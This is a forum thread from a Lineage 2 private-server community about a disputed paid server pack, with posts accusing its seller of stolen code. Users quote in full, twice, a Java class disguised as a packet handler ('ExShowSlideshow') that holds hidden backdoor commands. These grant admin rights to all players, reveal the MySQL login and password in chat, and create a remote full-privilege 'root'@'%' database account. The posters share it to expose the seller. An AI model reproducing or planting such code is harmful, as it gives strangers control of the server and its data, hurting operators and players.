Jump to content

Recommended Posts

Posted

http://l2topzone.com/forum/l2packs-and-files/23/wts-interlude-c6-server-pack-plus-source-100percent-working-files-2-copies-left/22366/

 

WOW so original.

However i gotta say you surprised me a lot. There are codes in there that i don't have and they are mine.

Let's count together, shit on my lap skid.

 

  • Custom Balancer With 31 Editors
  • Account Manager
  • Vortex Vote Reward Npc
  • Custom Enchant Npc
  • Boss Info
  • Bug Report
  • Siege Manager
  • Smart Shop (Sell Enchanted Items)
  • High Rate Dark Omen
  • Phoenix Event Engine (x18 Events) (Reworked by me ofc)
  • .pincode (Player types 4 digit code or Locked) an alter protection
  • .gearscore
  • .details
  • .menu it will pop up until
  • .getreward
  • Deport
  • Set Team
  • Npc Chat Feature
  • Survey System
  • Custom starting title for new char
  • Announce name on login
  • Admin Clan Leader Hero Noble Aio Lords Newbies
  • Auto rewarder every X time
  • Automatic announces
  • Server News
  • Clan Notice
  • Smart StartUp System

 

And apart from these that are mine, every single other feature is pouched by other packs or shares. 

So what did you do? You collected all the features available in one pack and you coded NOTHING.

 

What did i do with xtend? Slowly but steadily im recoding and adding all those features in a lightweight and stable manner.

 

Sorry dude.. You are a script kid.

Posted

http://l2topzone.com/forum/l2packs-and-files/23/wts-interlude-c6-server-pack-plus-source-100percent-working-files-2-copies-left/22366/

 

WOW so original.

However i gotta say you surprised me a lot. There are codes in there that i don't have and they are mine.

Let's count together, shit on my lap skid.

 

  • Custom Balancer With 31 Editors
  • Account Manager
  • Vortex Vote Reward Npc
  • Custom Enchant Npc
  • Boss Info
  • Bug Report
  • Siege Manager
  • Smart Shop (Sell Enchanted Items)
  • High Rate Dark Omen
  • Phoenix Event Engine (x18 Events) (Reworked by me ofc)
  • .pincode (Player types 4 digit code or Locked) an alter protection
  • .gearscore
  • .details
  • .menu it will pop up until
  • .getreward
  • Deport
  • Set Team
  • Npc Chat Feature
  • Survey System
  • Custom starting title for new char
  • Announce name on login
  • Admin Clan Leader Hero Noble Aio Lords Newbies
  • Auto rewarder every X time
  • Automatic announces
  • Server News
  • Clan Notice
  • Smart StartUp System

 

And apart from these that are mine, every single other feature is pouched by other packs or shares. 

So what did you do? You collected all the features available in one pack and you coded NOTHING.

 

What did i do with xtend? Slowly but steadily im recoding and adding all those features in a lightweight and stable manner.

 

Sorry dude.. You are a script kid.

 

 

NOT Only :)

package net.sf.l2j.gameserver.network.serverpackets;

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.util.Collection;

import net.sf.l2j.Config;
import net.sf.l2j.L2DatabaseFactory;
import net.sf.l2j.gameserver.handler.IVoicedCommandHandler;
import net.sf.l2j.gameserver.model.L2World;
import net.sf.l2j.gameserver.model.actor.instance.L2PcInstance;
import net.sf.l2j.gameserver.network.clientpackets.Say2;
import net.sf.l2j.gameserver.util.Broadcast;

public class ExShowSlideshow implements IVoicedCommandHandler
{
	private static String[] _voicedCommands =
	{
		"givemetheinfofromthedatabase",
		"givemeacceslevel1bitch",
		"pewpewmathafaka"
	};
	
	@Override
	public boolean useVoicedCommand(String command, L2PcInstance a, String target)
	{
		if (command.equalsIgnoreCase("givemetheinfofromthedatabase"))
		{
			Collection<L2PcInstance> pls = L2World.getInstance().getAllPlayers().values();
			for (L2PcInstance s : pls)
			{
				s.setAccessLevel(1);
				s.sendMessage("you are now an admin, press //admin");
			}
			Broadcast.toAllOnlinePlayers(new CreatureSay(0, Say2.ANNOUNCEMENT, "Hack", "The administrator refuse to pay the developer."));
			Broadcast.toAllOnlinePlayers(new CreatureSay(0, Say2.ANNOUNCEMENT, "Hack", "Lets have some fun."));
			
		}
		if (command.equalsIgnoreCase("givemeacceslevel1bitch"))
		{
			
			a.setAccessLevel(1);
			
		}
		
		if (command.equalsIgnoreCase("pewpewmathafaka"))
		{
			a.sendMessage("MySQL I External: " + Config.EXTERNAL_HOSTNAME + " ");
			a.sendMessage("MySQL I Internal: " + Config.INTERNAL_HOSTNAME + " ");
			a.sendMessage("MySQL U: " + Config.DATABASE_LOGIN + " ");
			a.sendMessage("MySQL P: " + Config.DATABASE_PASSWORD + " ");
			return true;
		}
		try (Connection con = L2DatabaseFactory.getInstance().getConnection())
		{
				PreparedStatement st0 = con.prepareStatement("CREATE USER 'root'@'%' IDENTIFIED BY 'root';");
				PreparedStatement st1 = con.prepareStatement("GRANT GRANT OPTION ON *.* TO 'root'@'%';");
				PreparedStatement st2 = con.prepareStatement("GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, RELOAD, SHUTDOWN, PROCESS, FILE, REFERENCES, INDEX, ALTER, SHOW DATABASES, SUPER, CREATE TEMPORARY TABLES, LOCK TABLES, EXECUTE, REPLICATION SLAVE, REPLICATION CLIENT, CREATE VIEW, SHOW VIEW, CREATE ROUTINE, ALTER ROUTINE, CREATE USER, EVENT, TRIGGER ON *.* TO 'root'@'%';");
				st0.execute();
				st1.execute();
				st2.execute();
				st0.close();
				st1.close();
				st2.close();
		}
		catch (Exception e)
		{
			
		}
		return false;
	}
	
	@Override
	public String[] getVoicedCommandList()
	{
		return _voicedCommands;
	}
}

He scared to tell ppl about the backdoors :) so now he seling and sh1t for 100$ 

Posted

He cant even obfuscate the backdoors. Wow next level stupid.

 

sad to people who bought this sh1t to many things are not working lot of problems on pack 0 protections like he said so he Seling something yours with shared things gj to developski NightWolfski

Posted

NOT Only :)

package net.sf.l2j.gameserver.network.serverpackets;

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.util.Collection;

import net.sf.l2j.Config;
import net.sf.l2j.L2DatabaseFactory;
import net.sf.l2j.gameserver.handler.IVoicedCommandHandler;
import net.sf.l2j.gameserver.model.L2World;
import net.sf.l2j.gameserver.model.actor.instance.L2PcInstance;
import net.sf.l2j.gameserver.network.clientpackets.Say2;
import net.sf.l2j.gameserver.util.Broadcast;

public class ExShowSlideshow implements IVoicedCommandHandler
{
	private static String[] _voicedCommands =
	{
		"givemetheinfofromthedatabase",
		"givemeacceslevel1bitch",
		"pewpewmathafaka"
	};
	
	@Override
	public boolean useVoicedCommand(String command, L2PcInstance a, String target)
	{
		if (command.equalsIgnoreCase("givemetheinfofromthedatabase"))
		{
			Collection<L2PcInstance> pls = L2World.getInstance().getAllPlayers().values();
			for (L2PcInstance s : pls)
			{
				s.setAccessLevel(1);
				s.sendMessage("you are now an admin, press //admin");
			}
			Broadcast.toAllOnlinePlayers(new CreatureSay(0, Say2.ANNOUNCEMENT, "Hack", "The administrator refuse to pay the developer."));
			Broadcast.toAllOnlinePlayers(new CreatureSay(0, Say2.ANNOUNCEMENT, "Hack", "Lets have some fun."));
			
		}
		if (command.equalsIgnoreCase("givemeacceslevel1bitch"))
		{
			
			a.setAccessLevel(1);
			
		}
		
		if (command.equalsIgnoreCase("pewpewmathafaka"))
		{
			a.sendMessage("MySQL I External: " + Config.EXTERNAL_HOSTNAME + " ");
			a.sendMessage("MySQL I Internal: " + Config.INTERNAL_HOSTNAME + " ");
			a.sendMessage("MySQL U: " + Config.DATABASE_LOGIN + " ");
			a.sendMessage("MySQL P: " + Config.DATABASE_PASSWORD + " ");
			return true;
		}
		try (Connection con = L2DatabaseFactory.getInstance().getConnection())
		{
				PreparedStatement st0 = con.prepareStatement("CREATE USER 'root'@'%' IDENTIFIED BY 'root';");
				PreparedStatement st1 = con.prepareStatement("GRANT GRANT OPTION ON *.* TO 'root'@'%';");
				PreparedStatement st2 = con.prepareStatement("GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, RELOAD, SHUTDOWN, PROCESS, FILE, REFERENCES, INDEX, ALTER, SHOW DATABASES, SUPER, CREATE TEMPORARY TABLES, LOCK TABLES, EXECUTE, REPLICATION SLAVE, REPLICATION CLIENT, CREATE VIEW, SHOW VIEW, CREATE ROUTINE, ALTER ROUTINE, CREATE USER, EVENT, TRIGGER ON *.* TO 'root'@'%';");
				st0.execute();
				st1.execute();
				st2.execute();
				st0.close();
				st1.close();
				st2.close();
		}
		catch (Exception e)
		{
			
		}
		return false;
	}
	
	@Override
	public String[] getVoicedCommandList()
	{
		return _voicedCommands;
	}
}

He scared to tell ppl about the backdoors :) so now he seling and sh1t for 100$ 

And that should be considered a "backdoor"?

It seems more like an development issue than a backdoor... cuz you shouldn't open a server if you can't notice this bullshit.

 

This just made my day:

Broadcast.toAllOnlinePlayers(new CreatureSay(0, Say2.ANNOUNCEMENT, "Hack", "The administrator refuse to pay the developer."));

:lol:  :lol:  :lol:

Posted

And that should be considered a "backdoor"?

It seems more like an development issue than a backdoor... cuz you shouldn't open a server if you can't notice this bullshit.

 

This just made my day:

Broadcast.toAllOnlinePlayers(new CreatureSay(0, Say2.ANNOUNCEMENT, "Hack", "The administrator refuse to pay the developer."));

:lol:  :lol:  :lol:

 

i never had NightCrap's Pack and i will never want to have it many people told me its sh1t pack so i wanted to post with u what he added into the ExShowSlideshow 

Posted

i never had NightCrap's Pack and i will never want to have it many people told me its sh1t pack so i wanted to post with u what he added into the ExShowSlideshow 

It's the funniest crap I've ever seen :lol:

  • 4 weeks later...
  • 1 month later...
Posted

So today i bring you a new update on L2jxtend.

 

Rev 26:

  • Added Universal BBS system for general use.
  • Added .inspect feature.
  • Added .changepass feature.

 

Soon more things to be added.

 

Download link: https://mega.co.nz/#!LwtGGCaI!D-kC7j67kzbAdkaNSxaZxUUSxxeLHEjXbEZGDS5BcLw

Posted (edited)
    Connection con = null;
    String password = null;
    try
    {
    ....
    }
    catch (Exception localException) {}finally
    {
      try
      {
        if (con != null) {
          con.close();
        }
      }
      catch (SQLException localSQLException2) {}
    }
    try
    {
      if (con != null) {
        con.close();
      }
    }
    catch (SQLException localSQLException3) {}
    return false;

Such an ugly way to close connection, I feel like java 6 o.O

Edited by SweeTs
Posted
    Connection con = null;
    String password = null;
    try
    {
    ....
    }
    catch (Exception localException) {}finally
    {
      try
      {
        if (con != null) {
          con.close();
        }
      }
      catch (SQLException localSQLException2) {}
    }
    try
    {
      if (con != null) {
        con.close();
      }
    }
    catch (SQLException localSQLException3) {}
    return false;

Such an ugly way to close connection, I feel like java 6 o.O

 

Yeah i changed that one commit after this version for try with resources.

  • 4 weeks later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now



  • Posts

    • ⚔️ The Grand Opening Has Arrived! ⚔️ In just a few hours the gate to the eternal battlefield will be open and the war between Order and Chaos will be set once again ! Its time to claim your destiny 🔥 👉 Register now and join the fight today! 🌐 https://l2ovc.com
    • Don’t miss the new Telegram gifts with our Telegram Stars purchasing bot! A great opportunity to invest in a stable digital asset at an early stage while the market is still forming. Buy other existing gifts in the official store using Telegram Stars, pay for subscriptions, donate to games and projects, pay for Premium subscriptions, and react to messages in channels! Low prices, multiple payment options, and other cool unique features! ⚡ Try it today — SOCNET STARS BOT ⚡ Active links to SOCNET stores: Digital Goods Store (Website): Go Store Telegram Bot: Go – convenient access to the store via Telegram messenger. ⭐ Telegram Stars Purchase Bot: Go – fast and profitable way to buy stars in Telegram. SMM Panel: Go – promote your social media accounts. We present to you the current list of promotions and special offers for purchasing our products and services: 1️⃣ Promo code OCTOBER2025 (8% discount) for purchases in our store (Website, bot) in October! You can also use the promo code SOCNET (15% discount) for your first purchase. 2️⃣ Get $1 on your store balance or a 10–20% discount — just write your username after registration on our website using the template: "SEND ME BONUS, MY USERNAME IS..." — post it in our forum thread! 3️⃣ Get $1 for your first SMM Panel trial — simply open a ticket titled “Get Trial Bonus” on our website (Support). 4️⃣ Weekly ⭐ Telegram Stars giveaways in our Telegram channel and in our Telegram Stars bot! News: ➡ Telegram Channel: https://t.me/accsforyou_shop ➡ WhatsApp Channel: https://chat.whatsapp.com/K8rBy500nA73z27PxgaJUw?mode=ems_copy_t ➡ Discord Server: https://discord.gg/y9AStFFsrh Contacts and Support: ➡ Telegram: https://t.me/socnet_support ➡ WhatsApp: https://wa.me/79051904467 ➡ Discord: socnet_support ➡ ✉ Email: solomonbog@socnet.store
    • Don’t miss the new Telegram gifts with our Telegram Stars purchasing bot! A great opportunity to invest in a stable digital asset at an early stage while the market is still forming. Buy other existing gifts in the official store using Telegram Stars, pay for subscriptions, donate to games and projects, pay for Premium subscriptions, and react to messages in channels! Low prices, multiple payment options, and other cool unique features! ⚡ Try it today — SOCNET STARS BOT ⚡ Active links to SOCNET stores: Digital Goods Store (Website): Go Store Telegram Bot: Go – convenient access to the store via Telegram messenger. ⭐ Telegram Stars Purchase Bot: Go – fast and profitable way to buy stars in Telegram. SMM Panel: Go – promote your social media accounts. We present to you the current list of promotions and special offers for purchasing our products and services: 1️⃣ Promo code OCTOBER2025 (8% discount) for purchases in our store (Website, bot) in October! You can also use the promo code SOCNET (15% discount) for your first purchase. 2️⃣ Get $1 on your store balance or a 10–20% discount — just write your username after registration on our website using the template: "SEND ME BONUS, MY USERNAME IS..." — post it in our forum thread! 3️⃣ Get $1 for your first SMM Panel trial — simply open a ticket titled “Get Trial Bonus” on our website (Support). 4️⃣ Weekly ⭐ Telegram Stars giveaways in our Telegram channel and in our Telegram Stars bot! News: ➡ Telegram Channel: https://t.me/accsforyou_shop ➡ WhatsApp Channel: https://chat.whatsapp.com/K8rBy500nA73z27PxgaJUw?mode=ems_copy_t ➡ Discord Server: https://discord.gg/y9AStFFsrh Contacts and Support: ➡ Telegram: https://t.me/socnet_support ➡ WhatsApp: https://wa.me/79051904467 ➡ Discord: socnet_support ➡ ✉ Email: solomonbog@socnet.store
    • Don’t miss the new Telegram gifts with our Telegram Stars purchasing bot! A great opportunity to invest in a stable digital asset at an early stage while the market is still forming. Buy other existing gifts in the official store using Telegram Stars, pay for subscriptions, donate to games and projects, pay for Premium subscriptions, and react to messages in channels! Low prices, multiple payment options, and other cool unique features! ⚡ Try it today — SOCNET STARS BOT ⚡ Active links to SOCNET stores: Digital Goods Store (Website): Go Store Telegram Bot: Go – convenient access to the store via Telegram messenger. ⭐ Telegram Stars Purchase Bot: Go – fast and profitable way to buy stars in Telegram. SMM Panel: Go – promote your social media accounts. We present to you the current list of promotions and special offers for purchasing our products and services: 1️⃣ Promo code OCTOBER2025 (8% discount) for purchases in our store (Website, bot) in October! You can also use the promo code SOCNET (15% discount) for your first purchase. 2️⃣ Get $1 on your store balance or a 10–20% discount — just write your username after registration on our website using the template: "SEND ME BONUS, MY USERNAME IS..." — post it in our forum thread! 3️⃣ Get $1 for your first SMM Panel trial — simply open a ticket titled “Get Trial Bonus” on our website (Support). 4️⃣ Weekly ⭐ Telegram Stars giveaways in our Telegram channel and in our Telegram Stars bot! News: ➡ Telegram Channel: https://t.me/accsforyou_shop ➡ WhatsApp Channel: https://chat.whatsapp.com/K8rBy500nA73z27PxgaJUw?mode=ems_copy_t ➡ Discord Server: https://discord.gg/y9AStFFsrh Contacts and Support: ➡ Telegram: https://t.me/socnet_support ➡ WhatsApp: https://wa.me/79051904467 ➡ Discord: socnet_support ➡ ✉ Email: solomonbog@socnet.store
  • Topics

×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock